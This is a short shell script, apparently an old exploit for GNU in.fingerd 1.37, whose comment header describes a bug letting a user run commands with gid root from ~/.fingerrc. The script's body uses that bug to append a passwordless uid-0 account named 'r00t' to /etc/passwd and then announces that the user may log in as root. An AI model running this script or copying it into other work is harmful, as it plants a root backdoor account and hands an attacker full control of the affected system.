#!/bin/sh
#
#   Systems running GNU in.fingerd(8) 1.37.
#
# There is a bug in  the `lib/site/userinfo.c'
# module of GNU  finger version 1.37 allowing
# any user on  a system to  execute arbitrary
# commands with gid root from  ~/.fingerrc.
# The problem is that  GNU finger  *first*
# changes   its  userid  thus   giving  away
# root privileges and *then* tries to change
# its gid which will not succeed.
#
#             ..2 second code by gov-boi

cat << _EOF_ >> ~/.fingerrc
echo "r00t::0:0::/root:/bin/sh" >> /etc/passwd
_EOF_
echo "you may now login as r00t - gov-boi"